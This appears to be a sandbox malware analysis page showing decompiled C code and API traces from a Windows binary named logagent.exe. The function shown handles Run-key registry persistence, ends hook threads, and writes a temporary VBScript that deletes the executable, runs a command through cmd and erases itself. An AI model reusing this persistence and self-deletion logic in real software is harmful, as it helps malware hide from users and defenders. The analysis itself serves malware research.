                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                  • exit.MSVCRT ref: 00408228
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: """, 0$6$C:\Windows\SysWOW64\logagent.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                  • API String ID: 740851534-3804875171
                                  • Opcode ID: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                  • Opcode Fuzzy Hash: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085AC Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E004085AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t63 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t63 = E0041050F(_t63);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E00412BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L0041416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L0041416A();
					_t90 =  &_v24;
					L00414146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L00414146();
				_t76 =  &_v56;
				L00414146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L0041416A();
					_t86 =  &_v56;
					L00414146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L0041414C();
				_t81 =  &_v72;
				L0041414C();
				_t82 =  &_v56;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 00408720
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                  • exit.MSVCRT ref: 00408980
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1819783940-1536747724
                                  • Opcode ID: 30d0b3e98f787ee3ba42b6988a464d3848a7d6b1905986fedc43bf1a88a5ab0d
                                  • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                  • Opcode Fuzzy Hash: 30d0b3e98f787ee3ba42b6988a464d3848a7d6b1905986fedc43bf1a88a5ab0d
                                  • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408245 Relevance: 110.5, APIs: 49, Strings: 14, Instructions: 260registryCOMMON
                                  Download Yara Rule
